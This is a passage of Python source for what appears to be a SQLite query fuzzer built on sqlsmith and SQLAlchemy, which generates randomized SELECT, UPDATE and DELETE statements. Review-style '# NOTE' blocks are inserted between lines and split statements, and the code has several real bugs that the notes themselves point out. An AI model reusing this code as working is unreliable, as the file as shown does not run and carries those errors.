subprocess.getoutput(cmd)\n\n return output\n\n def _gen_sqlsmith_queries(self, query_num, timeout):\n \"\"\" generate sqlsmith queries on postgres DB using OLDEST version \"\"\"\n\n dsn = \"file:%s?mode=ro\" % DB_FILE\n\n cmd = \"timeout %ds ./sqlsmith --verbose --exclude-catalog \\\n --dump-all-queries \\\n --seed=%d --max-queries=%d --sqlite=\\\"%s\\\" \\\n 1> %s 2> %s\" % \\\n (timeout, randoms.random_int_range(1000000), query_num, dsn,\n self.TMP_QUERY_PN, self.TMP_ERR_PN)\n\n subprocess.getoutput(cmd)\n\n def extract_valid_query(self):\n query_result = []\n extract_queries = []\n\n with open(self.TMP_ERR_PN, 'r') as f:\n data = f.read()\n results = \"\"\n if \"Generating\" in data and \"quer\" in data:\n results = data.split(\"Generating indexes...done.\")[1].split(\n \"queries:\")[0]\n results = results.replace(\"\\n\", \"\").strip()\n\n for x in range(len(results)):\n if results[x] == \"e\":\n query_result.append(\"fail\")\n elif results[x] == \".\":\n query_result.append(\"success\")\n elif results[x] == \"S\":\n query_result.append(\"syntax error\")\n elif results[x] == \"C\":\n query_result.append(\"crash server!!!\")\n os.system(\"cat %s >> %s/crashed\" % self.TMP_QUERY_PN,\n FUZZ_MAIN)\n elif results[x] == \"t\":\n query_result.append(\"timeout\")\n else:\n raise Exception('Not possible!')\n\n with open(self.TMP_QUERY_PN, 'r') as f:\n data = f.read()\n results = data.split(\";\")[:-1]\n\n for x in range(len(results)):\n try:\n if query_result[x] == \"success\":\n extract_queries.append(results[x] + \";\")\n\n except Exception:\n pass\n\n return extract_queries\n\n def gen_sqlsmith_queries(self):\n self._gen_sqlsmith_queries(150, 10) # generate query and store text\n queries = self.extract_valid_query()\n\n for query in queries:\n print(self.run_sqlite_query(query))\n\n def DBMS_specific_keyword_addition(self):\n \"\"\" insert DBMS specific keyword which should not affect to result\n e.g, venign pragma, vacuum\n \"\"\"\n \"\"\"\n PRAGMA reverse_unordered_selects=true;\n PRAGMA journal_mode=OFF;\n PRAGMA main.cache_size=0;\n \"\"\"\n pass\n\n def drop_tables(self):\n \"\"\" randomly drop some table \"\"\"\n pass\n\n def create_index(self):\n \"\"\"\n e.g.,\n CREATE INDEX index_0 ON test(c1 COLLATE NOCASE);\n CREATE INDEX index_0 ON test(c0 LIKE '');\n CREATE UNIQUE INDEX index_1 ON test(c0 GLOB c1);\n\n CREATE UNIQUE INDEX IF NOT EXISTS index_0 ON test(c1 == FALSE);\n CREATE INDEX IF NOT EXISTS index_1 ON test(c0 || FALSE) WHERE c1;\n PRAGMA legacy_file_format=true;\n REINDEX; -- Error: UNIQUE constraint failed: index 'index_0'\n\n # create non existing index\n CREATE TABLE t0(c1, c2);\n INSERT INTO t0(c1, c2) VALUES ('a', 1);\n CREATE INDEX i0 ON t0(\"C3\");\n ALTER TABLE t0 RENAME COLUMN c1 TO c3;\n SELECT DISTINCT * FROM t0; -- fetches C3|1 rather than a|1\n \"\"\"\n\n # should store the result to self.create_insert\n\n pass\n\n def select_with_typecast(self):\n \"\"\"\n INSERT INTO t0(c0) VALUES (1);\n PRAGMA reverse_unordered_selects=true;\n SELECT * FROM t0 WHERE ((t0.c0 > 'a') OR (t0.c0 <= 'a'));\n -- fetches no row\n \"\"\"\n pass\n\n def get_rand_data(self, typename):\n if typename == 'String':\n gendata = randoms.ret_randomdata_by_type(typename,\n constraint=MAX_STRING)\n\n if typename == 'Integer':\n gendata = randoms.ret_randomdata_by_type(\n typename,\n min=BOUNDARY[\"Integer\"][0],\n max=BOUNDARY[\"Integer\"][1])\n\n elif typename == 'DateTime':\n gendata = randoms.ret_randomdata_by_type(typename,\n min=DATE_START,\n max=DATE_END)\n\n elif typename == 'Float':\n 
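# NOTE: in `extract_valid_query` above, the crash branch reads
#   os.system("cat %s >> %s/crashed" % self.TMP_QUERY_PN, FUZZ_MAIN)
# which raises TypeError twice over: the format arguments must be a tuple and
# os.system takes a single argument, i.e.
#   os.system("cat %s >> %s/crashed" % (self.TMP_QUERY_PN, FUZZ_MAIN))
# The status-character decoding itself maps sqlsmith's progress glyphs to
# outcomes; a hedged standalone sketch:
STATUS = {"e": "fail", ".": "success", "S": "syntax error",
          "C": "crash server!!!", "t": "timeout"}

def decode_progress(glyphs: str) -> list:
    # Raises KeyError on an unknown glyph, mirroring the original's strictness.
    return [STATUS[g] for g in glyphs]

print(decode_progress("..eS"))  # ['success', 'success', 'fail', 'syntax error']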
gendata = randoms.ret_randomdata_by_type(typename,\n min=BOUNDARY[\"Float\"][0],\n max=BOUNDARY[\"Float\"][1])\n\n return gendata\n\n @staticmethod\n def remove_idx_by_name(sqlalchemy_tbl, idx_name, engine):\n \"\"\"\n remove index from the target table using index_name (String)\n \"\"\"\n\n idx_list = list(sqlalchemy_tbl.indexes)\n\n out = []\n for idx in idx_list:\n if idx.name != idx_name:\n out.append(idx)\n else:\n idx.drop(engine)\n\n # TODO: we are not sure about the safety here\n sqlalchemy_tbl.indexes = set(out)\n\n @staticmethod\n def ret_column_by_name(sqlalchemy_tbl, name):\n for col in sqlalchemy_tbl._columns:\n # print(col.name)\n if col.name == name:\n return col\n assert \"Column not exist in the table\"\n\n @staticmethod\n def choose_columns_sqlalchemy(table, column_names, option):\n # table: sqlalchemy object\n # column_names: string\n\n if option == \"one\":\n num_cols = 1\n chosen_columns = random.choices(\n column_names, k=randoms.random_int_range(num_cols))\n\n elif option == \"all\":\n chosen_columns = column_names\n\n elif option == \"wo_idx\":\n # TODO: fix here (like with_idx)\n defined_indexes = set(map(lambda x: x.name, list(table.indexes)))\n chosen_columns = list(set(column_names) - defined_indexes)\n\n elif option == \"with_idx\":\n # print(str(list(list(table.indexes)[0].columns)[0]).split(\".\")[1])\n chosen_columns = list(\n map(lambda x: str(list(x.columns)[0]).split(\".\")[1],\n list(table.indexes)))\n\n else:\n num_cols = len(column_names)\n chosen_columns = random.choices(\n column_names, k=randoms.random_int_range(num_cols))\n\n out = []\n for item in chosen_columns:\n # print(table.c)\n # print(item)\n selected_col = getattr(table.c, item)\n out.append(selected_col)\n\n return out\n\n def choose_columns_sqlalchemy_type(self, tbl, _type):\n # tableinfo: should know the name of each column\n\n tbl_idx = self.alc_tables.index(tbl)\n tbl_names = self.tables_stat[tbl_idx].column_name\n tbl_types = self.tables_stat[tbl_idx].column_type\n\n sametype_cols = []\n for x in range(len(tbl_types)):\n if tbl_types[x] == _type:\n sametype_cols.append(tbl_names[x])\n\n chosen_col_name = random.choice(sametype_cols)\n selected_col = getattr(tbl.c, chosen_col_name)\n\n return selected_col\n\n def choose_columns(self, table, mutable=False):\n \"\"\"\n return randomly chosen column index of table\n - mutable:False ==> disregard pk/fk columns\n - mutable:True ==> consider all columns\n \"\"\"\n return_candidate = list(range(len(table.columns)))\n\n pk_idx = table.pk_idx\n fk_idx = table.fk_idx\n\n if mutable is True:\n return_candidate.remove(pk_idx)\n if fk_idx in return_candidate:\n return_candidate.remove(fk_idx)\n\n random.shuffle(return_candidate)\n # print (\"before ret\", return_candidate)\n\n if len(return_candidate) < 1:\n return []\n # This condition is for where\n # TODO: use more than two where conditions\n elif mutable is False:\n return [return_candidate[0]]\n else:\n return_num = randoms.random_int_range(len(return_candidate)) - 1\n return_list = return_candidate[0:return_num]\n\n return return_list\n\n def ret_set_str(self, set_dict):\n\n set_list = []\n\n for column_name in set_dict.keys():\n newdata, typename = set_dict[column_name]\n # print(newdata, typename)\n if typename in NUMERIC:\n set_list.append(\"\\\"%s\\\" = %s\" % (column_name, newdata))\n else:\n set_list.append(\"\\\"%s\\\" = \\\"%s\\\"\" % (column_name, newdata))\n\n return ',\\n'.join(map(str, set_list))\n\n def ret_typename_from_class(self, typeclass):\n if \"VARCHAR\" in 
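# NOTE: in `ret_column_by_name` above, `assert "Column not exist in the table"`
# asserts a non-empty string, which is always truthy, so a missing column
# silently falls through and returns None. A hedged fix that actually raises:
def ret_column_by_name(sqlalchemy_tbl, name):
    for col in sqlalchemy_tbl._columns:
        if col.name == name:
            return col
    raise AssertionError("Column %r does not exist in table %r"
                         % (name, sqlalchemy_tbl.name))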
str(typeclass):\n typename = \"String\"\n else:\n typename = typeclass.__name__\n return typename\n\n @staticmethod\n def ret_limit_num(tblstat):\n # return limit, offset from the given TableStat class\n offset = randoms.random_int_range(tblstat.table_size - 1)\n limit = randoms.random_int_range(tblstat.table_size - offset)\n return limit, offset\n\n def select_tuples(self,\n template_seed=0,\n idx=None,\n cur_sqlalchemy_table=None,\n column_names=None):\n \"\"\"\n * should maintain statistics when insert\n \"\"\"\n CONJ = [\"and\", \"or\"]\n # sharing code for all templates:\n if (idx is None and cur_sqlalchemy_table is None\n and column_names is None):\n idx = random.choice(range(len(self.sqlalchemy_tables)))\n cur_sqlalchemy_table = self.sqlalchemy_tables[idx]\n column_names = self.tables_stat[idx].column_name\n ###############################\n # [*] NORMAL SELECT: one table\n ###############################\n if (template_seed == 0):\n print(\"*normal select one table\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n\n stmt = select(select_columns)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return stmt\n ###############################\n # [*] NORMAL SELECT: limit and offset\n ###############################\n elif (template_seed == 1):\n print(\"*normal select limit and offset\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n\n limit, offset = CreateSequences.ret_limit_num(\n self.tables_stat[idx])\n stmt = select(select_columns).limit(limit).offset(offset)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return stmt\n ###############################\n # [*] NORMAL SELECT: group by\n ###############################\n elif (template_seed == 2):\n print(\"*normal select group by\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n group_by_columns = random.choices(select_columns,\n k=randoms.random_int_range(\n len(select_columns)))\n\n stmt = select(select_columns)\n for column in group_by_columns:\n stmt = stmt.group_by(column)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return stmt\n ###############################\n # [*] NORMAL SELECT: having\n ###############################\n elif (template_seed == 3):\n print(\"*normal select having\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n group_by_columns = random.choices(select_columns,\n k=randoms.random_int_range(\n len(select_columns)))\n\n # group_by first (before having)\n stmt = select(select_columns)\n for column in group_by_columns:\n stmt = stmt.group_by(column)\n\n # then, apply having (similar with where)\n having_col = random.choice(group_by_columns)\n # print(\"?\")\n having_col_stat = self.tables_stat[idx].ret_stat(having_col.name)\n # print(\"?\", having_col_stat)\n\n having_col_data = self.tables_stat[idx].ret_string(having_col.name)\n # print(\"?\", having_col_data)\n\n having_col_cond = where_generator(having_col, None,\n having_col_stat, None,\n having_col_data)\n # print(\"?\")\n\n stmt = stmt.having(having_col_cond)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return stmt\n ###############################\n # [*] NORMAL SELECT + ONE WHERE CONDITION (e.g., where (A))\n ###############################\n elif (template_seed == 4):\n\n print(\"*NORMAL SELECT + ONE WHERE 
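# NOTE (hedged sketch): `ret_limit_num` keeps LIMIT/OFFSET inside the table's
# row count so the templated query can still return rows. The invariant, as a
# standalone check; random_int_range is assumed here to return 1..n inclusive,
# matching how the surrounding code uses it.
import random

def random_int_range(n: int) -> int:
    return random.randint(1, n)

table_size = 10
offset = random_int_range(table_size - 1)        # 1 .. size-1
limit = random_int_range(table_size - offset)    # 1 .. size-offset
assert offset + limit <= table_size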
CONDITION\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n column1 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename1, columnname1 = str(column1).split(\".\")\n column1_stat = self.tables_stat[idx].ret_stat(columnname1)\n column1_data = self.tables_stat[idx].ret_string(columnname1)\n\n column1_where = where_generator(column1, None, column1_stat, None,\n column1_data)\n column2_where = where_generator(column1, None, column1_stat, None,\n column1_data)\n\n stmt_where1 = select(select_columns).where(column1_where)\n # stmt_where2 = select(select_columns).where(column2_where)\n # stmt_union = stmt_where1.union(stmt_where2)\n\n if True:\n print(literalquery(stmt_where1) + \";\", file=sys.stderr)\n # print(literalquery(stmt_where2)+\";\",file=sys.stderr)\n # print(literalquery(stmt_union)+\";\",file=sys.stderr)\n return stmt_where1\n ###############################\n # [*] NORMAL SELECT + TWO WHERE CONDITIONS (e.g., where(A and B))\n ###############################\n elif (template_seed == 5):\n\n print(\"*NORMAL SELECT + two WHERE CONDITION\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n column1 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename1, columnname1 = str(column1).split(\".\")\n column1_stat = self.tables_stat[idx].ret_stat(columnname1)\n column1_data = self.tables_stat[idx].ret_string(columnname1)\n\n column1_where = where_generator(column1, None, column1_stat, None,\n column1_data)\n column2 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename2, columnname2 = str(column2).split(\".\")\n column2_stat = self.tables_stat[idx].ret_stat(columnname2)\n column2_data = self.tables_stat[idx].ret_string(columnname2)\n column2_where = where_generator(column2, None, column2_stat, None,\n column2_data)\n\n # combine and / or\n if (column1_where is not None and column2_where is not None):\n combined_where = combine_condition(column1_where,\n column2_where,\n random.choice(CONJ))\n stmt_where2 = select(select_columns).where(combined_where)\n if True:\n print(literalquery(stmt_where2) + \";\", file=sys.stderr)\n return stmt_where2\n ###############################\n # [*] NORMAL SELECT + TWO MORE WHERE NESTED CONDITIONS\n # (e.g., where ((A and B) and C))\n ###############################\n elif (template_seed == 6):\n print(\"*NORMAL SELECT + TWO MORE WHERE NESTED CONDITIONS\")\n\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"random\")\n column1 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename1, columnname1 = str(column1).split(\".\")\n column1_stat = self.tables_stat[idx].ret_stat(columnname1)\n column1_data = self.tables_stat[idx].ret_string(columnname1)\n\n column1_where = where_generator(column1, None, column1_stat, None,\n column1_data)\n column2 = CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename2, columnname2 = str(column2).split(\".\")\n column2_stat = self.tables_stat[idx].ret_stat(columnname2)\n column2_data = self.tables_stat[idx].ret_string(columnname2)\n column2_where = where_generator(column2, None, column2_stat, None,\n column2_data)\n\n column3 = 
CreateSequences.choose_columns_sqlalchemy(\n cur_sqlalchemy_table, column_names, option=\"one\")[0]\n tablename3, columnname3 = str(column3).split(\".\")\n column3_stat = self.tables_stat[idx].ret_stat(columnname3)\n column3_data = self.tables_stat[idx].ret_string(columnname3)\n column3_where = where_generator(column3, None, column3_stat, None,\n column3_data)\n if (column1_where is not None and column2_where is not None\n and column3_where is not None):\n\n combined_where1 = combine_condition(column1_where,\n column2_where,\n random.choice(CONJ))\n combined_where2 = combine_parenthesis(combined_where1,\n column3_where,\n random.choice(CONJ))\n stmt_where3 = select(select_columns).where(combined_where2)\n if True:\n print(literalquery(stmt_where3) + \";\", file=sys.stderr)\n return stmt_where3\n\n ###############################\n # [*] NORMAL SELECT + LIMIT + HAVING + GROUPBY\n ###############################\n\n # small_s = select([student.c.studentid, student.c.name,\n # func.avg(marks.c.total_marks-5)]).limit(0)\n\n # s = select([student.c.studentid, student.c.name,\n # func.avg(marks.c.total_marks-5)])\\\n # .where( and_(student.c.studentid == marks.c.studentid, \\\n # marks.c.total_marks >=\\\n # select([marks.c.total_marks]).where(marks.c.studentid == 'V003')))\\\n # .order_by(asc(student.c.studentid))\\\n # .limit(4)\\\n # .offset(0)\\\n # .group_by(student.c.name, student.c.studentid)\\\n # .having(func.avg(marks.c.total_marks) > 80)\\\n # .distinct()\n\n # stmt_limit = select(select_columns).where(combined_where2)\n # if False:\n # print(literalquery(stmt_limit))\n\n ###############################\n # [*] JOIN\n ###############################\n\n # \"\"\"\n # j = join(Student, StudentCourse, Student.c.roll_no\n # == StudentCourse.c.roll_no)\n # s = select([StudentCourse.c.course_id, Student.c.name,\n # Student.c.age]).select_from(j)\n # \"\"\"\n\n elif (template_seed == 7):\n print(\"*JOIN\")\n # idx = random.choice(range(len(self.sqlalchemy_tables)))\n # cur_sqlalchemy_table = self.sqlalchemy_tables[idx]\n\n tbl1, tbl2, tbl1_col, tbl2_col, tbl1_idx = self.choose_join_tables(\n )\n column_names = self.tables_stat[tbl1_idx].column_name\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n tbl1, column_names, option=\"random\")\n\n j = join(tbl1, tbl2, tbl1_col == tbl2_col)\n stmt_join1 = select(select_columns).select_from(j)\n if True:\n print(literalquery(stmt_join1) + \";\", file=sys.stderr)\n return stmt_join1\n ###############################\n # [*] SUBQUERY#1: using two tables\n ###############################\n\n # \"\"\"\n # s = select([student.c.studentid, student.c.name, marks.c.total_marks])\\\n # .where( and_(student.c.studentid == marks.c.studentid, \\\n # marks.c.total_marks > select( [func.avg(marks.c.total_marks)])\\\n # .where(marks.c.total_marks > 80)) )\n # \"\"\"\n elif (template_seed == 8):\n\n print(\" * SUBQUERY#1: using two tables\")\n\n # select target tables for subquery\n tbl1, tbl2, tbl1_col, tbl2_col, tbl1_idx = self.choose_join_tables(\n )\n select_columns = CreateSequences.choose_columns_sqlalchemy(\n tbl1, column_names, option=\"random\")\n tbl1_sametype_col, tbl2_sametype_col, typename = \\\n self.choose_same_type_columns(tbl1, tbl2)\n # we have to use type of each column\n # 1) select two columns with same types\n stmt_sub1 = select(select_columns)\\\n .where(and_(tbl1_col == tbl2_col,\n tbl1_sametype_col > select([tbl2_sametype_col])))\n print(literalquery(stmt_sub1) + \";\", file=sys.stderr)\n return stmt_sub1\n # 2) select two 
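# NOTE (hedged sketch): template 7 builds an explicit JOIN with
# sqlalchemy.join plus select_from. Reduced to two invented tables, in the
# same 1.x select([...]) style the repo uses:
from sqlalchemy import MetaData, Table, Column, Integer, join, select

meta = MetaData()
a = Table("a", meta, Column("id", Integer, primary_key=True))
b = Table("b", meta, Column("id", Integer, primary_key=True),
          Column("a_id", Integer))
j = join(a, b, a.c.id == b.c.a_id)
stmt = select([a.c.id, b.c.id]).select_from(j)
print(stmt)  # renders roughly: SELECT a.id, b.id FROM a JOIN b ON a.id = b.a_id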
columns regardless of types and CAST\n\n def update_tuples_sqlalchemy(self):\n # update_query = ''\n\n for x in range(len(self.sqlalchemy_tables)):\n cur_table = self.tables[x]\n cur_sqlalchemy_table = self.sqlalchemy_tables[x]\n selected_columns = self.choose_columns(cur_table,\n mutable=True) # array\n set_candidate = {}\n\n for column_idx in selected_columns:\n \"\"\"\n if \"VARCHAR\" in str(self.tables[x].columns[column_idx][1]):\n typename = \"String\"\n else:\n typename = self.tables[x].columns[column_idx][1].__name__\n \"\"\"\n typename = self.ret_typename_from_class(\n str(self.tables[x].columns[column_idx][1]))\n column_name = self.tables[x].columns[column_idx][0]\n\n newdata = self.get_rand_data(typename)\n set_candidate[column_name] = (newdata, typename)\n\n set_str = self.ret_set_str(set_candidate)\n if set_str == \"\":\n continue\n\n # print(set_candidate)\n # where_column_idx = selected_columns[0]\n where_operator = COMPARISONS[randoms.random_int_range(\n len(COMPARISONS) - 1)]\n if typename in NUMERIC:\n where_str = \"\\\"%s\\\" %s %s\" % (column_name, where_operator,\n newdata)\n else:\n where_str = \"\\\"%s\\\" %s \\\"%s\\\"\" % (column_name, where_operator,\n newdata)\n\n # TODO: debugging here\n # print(where_str)\n # print(set_str)\n # print(dir(cur_table))\n stmt = cur_sqlalchemy_table.update().where(where_str).\\\n value(set_str)\n if False:\n print(literalquery(stmt))\n\n def update_tuples(self):\n \"\"\" update template\n UPDATE table\n SET column_1 = new_value_1,\n column_2 = new_value_2\n WHERE\n search_condition\n ORDER column_or_expression\n LIMIT row_count OFFSET offset;\n \"\"\"\n \"\"\"\n - pick 1~2 columns (which is not pk, fk)\n - where uses data generation\n - random operators\n \"\"\"\n \"\"\"\n TODO:\n UPDATE OR REPLACE\n \"\"\"\n\n update_query = ''\n for x in range(len(self.tables)):\n if randoms.prob(conf.PROB_TABLE[\"PROB_UPDATE\"]):\n # print(\"Update %s table\" % self.tables[x].table_name)\n\n # 1) Update table name\n update_query = UPDATE.replace(\"{table}\",\n self.tables[x].table_name)\n selected_columns = self.choose_columns(self.tables[x],\n mutable=True) # array\n\n # 2) Set\n set_candidate = {}\n for column_idx in selected_columns:\n\n if \"VARCHAR\" in str(self.tables[x].columns[column_idx][1]):\n typename = \"String\"\n else:\n typename = self.tables[x].\\\n columns[column_idx][1].__name__\n column_name = self.tables[x].columns[column_idx][0]\n\n newdata = self.get_rand_data(typename)\n set_candidate[column_name] = (newdata, typename)\n\n set_str = self.ret_set_str(set_candidate)\n if set_str == \"\":\n continue\n update_query = update_query.replace(\"{set}\", set_str)\n\n # 3) Where\n # - first, we apply only one where condition\n # TODO: multiple where condition\n # TODO: add constant\n # TODO: add cast\n where_column_idx = selected_columns[0]\n where_operator = COMPARISONS[randoms.random_int_range(\n len(COMPARISONS) - 1)]\n\n if \"VARCHAR\" in \\\n str(self.tables[x].columns[where_column_idx][1]):\n typename = \"String\"\n else:\n typename = self.tables[x].\\\n columns[where_column_idx][1].__name__\n column_name = self.tables[x].columns[where_column_idx][0]\n newdata = self.get_rand_data(typename)\n\n if typename in NUMERIC:\n where_str = \"\\\"%s\\\" %s %s\" % (column_name, where_operator,\n newdata)\n else:\n where_str = \"\\\"%s\\\" %s \\\"%s\\\"\" % (column_name,\n where_operator, newdata)\n update_query = update_query.replace(\"{where}\", where_str)\n # 4) Limit\n if randoms.prob(conf.PROB_TABLE[\"PROB_UPDATE_LIMIT\"]):\n 
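# NOTE: two likely bugs in `update_tuples_sqlalchemy` above.
#   1) ret_typename_from_class(str(...)) passes a str, but the helper calls
#      typeclass.__name__ on the non-VARCHAR path, which would raise
#      AttributeError; the other call sites pass the type object directly.
#   2) Update objects expose .values(), not .value(); and .where() expects a
#      SQL expression, so a raw string is better wrapped with sqlalchemy.text.
# A hedged corrected sketch of the final statement construction:
from sqlalchemy import text

def build_update(sqlalchemy_table, where_str: str, set_dict: dict):
    return sqlalchemy_table.update().where(text(where_str)).values(set_dict)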
update_query += \"\\nLIMIT %d\" % (\n randoms.random_int_range(3))\n\n update_query += \";\"\n\n else:\n # print(\"Don't update %s table\" % self.tables[x].table_name)\n pass\n\n if \"{set}\" not in update_query:\n self.update = update_query\n\n def delete_tuples(self):\n \"\"\" template\n DELETE FROM table\n WHERE search_condition\n ORDER BY criteria,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n LIMIT row_count OFFSET offset;\n \"\"\"\n\n delete_query = ''\n\n for x in range(len(self.tables)):\n if randoms.prob(conf.PROB_TABLE[\"PROB_DELETE\"]):\n\n # 1) Delete table name\n delete_query = DELETE.replace(\"{table}\",\n self.tables[x].table_name)\n # table_name = self.tables[x].table_name\n selected_columns = self.choose_columns(self.tables[x],\n mutable=True) # array\n\n if len(selected_columns) == 0:\n continue\n\n # 2) Where\n where_column_idx = selected_columns[0]\n where_operator = COMPARISONS[randoms.random_int_range(\n len(COMPARISONS) - 1)]\n\n # data = self.tables[x].row_data[0][where_column_idx]\n\n if \"VARCHAR\" in \\\n str(self.tables[x].columns[where_column_idx][1]):\n typename = \"String\"\n else:\n typename = self.tables[x].\\\n columns[where_column_idx][1].__name__\n column_name = self.tables[x].columns[where_column_idx][0]\n newdata = self.get_rand_data(typename)\n\n if typename in NUMERIC:\n where_str = \"\\\"%s\\\" %s %s\" % (column_name, where_operator,\n newdata)\n else:\n where_str = \"\\\"%s\\\" %s \\\"%s\\\"\" % (column_name,\n where_operator, newdata)\n delete_query = delete_query.replace(\"{where}\", where_str)\n\n # 3) Limit\n if randoms.prob(conf.PROB_TABLE[\"PROB_UPDATE_LIMIT\"]):\n delete_query += \"\\nLIMIT %d\" % (\n randoms.random_int_range(3))\n delete_query += \";\"\n\n if \"{where}\" not in delete_query:\n self.delete = delete_query\n\n def mutation(self, component):\n if component == \"select\":\n sm = SelectMutation(self.tables_stat, self.tables,\n self.sqlalchemy_tables)\n sm.select_mutation()\n\n elif component == \"index\":\n im = IndexMutation(self.tables_stat, self.tables,\n self.sqlalchemy_tables, self.sqlite_engine)\n im.index_mutation()\n\n elif component == \"where\":\n wm = WhereMutation(self.tables_stat, self.tables,\n self.sqlalchemy_tables, self.sqlite_engine)\n wm.where_mutation()\n\n\ndef stmt_complex(stmt, available_columns):\n # given a statement, randomly add stuff in the tail\n # available_columns: column object from the sa_table\n # group\n # print(\"ac\", available_columns)\n print(\"examine project columns\", type(stmt.c))\n if (random_int_range(1000) < conf.PROB_TABLE[\"group\"]):\n chosen_groupby_columns = random.choices(\n available_columns,\n k=randoms.random_int_range(len(available_columns)))\n for column in chosen_groupby_columns:\n stmt = stmt.group_by(column)\n # distinct entire select\n if (random_int_range(1000) < conf.PROB_TABLE[\"distinct\"]):\n stmt = stmt.distinct()\n # order\n if (random_int_range(1000) < conf.PROB_TABLE[\"order\"]):\n chosen_orderby_columns = random.choices(available_columns, k=1)\n for column in chosen_orderby_columns:\n if (ret_typename_from_class(column.type) in [\"Float\", \"Integer\"]):\n stmt = stmt.order_by(asc(column))\n # limit\n if (random_int_range(1000) < conf.PROB_TABLE[\"limit\"]):\n stmt = stmt.limit(random_int_range_contain_zero(20))\n\n if (random_int_range(1000) < conf.PROB_TABLE[\"offset\"]):\n stmt = stmt.offset(random_int_range_contain_zero(20))\n return stmt\n\n\ndef rule_expandaggregatedistinct(spec, query_count):\n # this generation mechanism have 
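# NOTE: the ORDER BY line in the delete_tuples docstring above carries a run of
# stray commas; the template presumably reads "ORDER BY criteria".
# Separately, a hedged sketch of the control pattern in `stmt_complex`, which
# decorates a SELECT with probability-gated DISTINCT / LIMIT / OFFSET clauses;
# PROB is an invented stand-in for conf.PROB_TABLE:
import random

PROB = {"distinct": 300, "limit": 500}   # per-mille thresholds (invented)

def complicate(stmt):
    if random.randint(1, 1000) < PROB["distinct"]:
        stmt = stmt.distinct()
    if random.randint(1, 1000) < PROB["limit"]:
        stmt = stmt.limit(random.randint(0, 20))
    return stmt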
already been integrated into the generator.\n select_number_of_columns = 2\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n select_number_of_columns)\n stmt = select(select_columns).where(where_clause)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n return query_count\n\n\ndef rule_aggregatecaserule(spec, query_count):\n # this generation mechanism have already been integrated into the generator.\n print(\"begin fire aggregate case rule\")\n select_number_of_columns = 2\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n select_number_of_columns)\n stmt = select(select_columns).where(where_clause)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n return query_count\n\n\ndef rule_aggregatevaluesrule(spec, query_count):\n # this generation mechanism have already been integrated into the generator.\n print(\"begin fire aggregate values rule\")\n select_number_of_columns = 3\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n select_number_of_columns)\n stmt = select(select_columns).where(where_clause)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n return query_count\n\n\ndef reproduce_bug1(spec, query_count):\n print(\"begin reproduce bug about reoptimize expression tree\")\n # select_number_of_columns = random_int_range(3)\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n )\n stmt = select(select_columns).where(where_clause)\n selectable_columns = []\n sqlalchemy_tables = spec.scope.alc_tables\n table_a = spec.scope.alc_tables[table_idx]\n for item in table_a._columns:\n selectable_columns.append(item)\n stmt = stmt_complex(stmt, selectable_columns)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n # stmt = select(select_columns)\n # print(type(select_columns[0].type))\n if (ret_typename_from_class(select_columns[0].type) == \"String\"):\n select_columns_, where_clause_, table_idx_, _ = spec.gen_select_statement(\n 1)\n enclosing_stmt = select(select_columns_).where(\n not_(stmt.as_scalar().is_distinct_from(conf.SCALAR_STR)))\n query_count += 1\n print(literalquery(enclosing_stmt) + \";\", file=sys.stderr)\n\n return query_count\n\ndef top_generation(spec, query_count):\n # select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n # )\n # if(spec.joined is True):\n # spec.getjoined()\n # stmt = select(select_columns).select_from.where(where_clause)\n # stmt = stmt_complex(stmt)\n\n # else:\n # stmt = select(select_columns).where(where_clause)\n # if conf.PROB_TABLE[\"scalar\"]:\n # # choose from an existing stmt\n # if conf.PROB_TABLE[\"set\"]:\n # # get a previous subquery that has the same number of\n # # for loop call\n # return\n # print(final_stmt)\n return\ndef set_query_generation(spec, stmt, select_expr):\n temp_query = stmt\n success_flag = False\n for i in range(3):\n # try to create a super query that involve 10 set operations\n print(\"len\", len(select_expr))\n try:\n select_columns, where_clause, table_idx, selectable_columns, joined_from, base_table = spec.gen_select_statement(select_column_number=len(select_expr), force_simple_from = True)\n except Exception as inst:\n # this might cause exception because joined_from does not have that many selectable columns\n print(\"exception in using set operations\", inst)\n traceback.print_exc(file=sys.stdout)\n continue\n if (base_table 
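# NOTE (hedged sketch): `set_query_generation` only combines queries whose
# select lists are "set compatible": for each column of the first query it
# looks for a column of matching type in the second, de-duplicates, and gives
# up when the counts differ. The matching logic alone, on (name, typename)
# pairs invented for illustration:
def reorder_by_type(target_types, candidates):
    out = []
    for t in target_types:
        for c in candidates:
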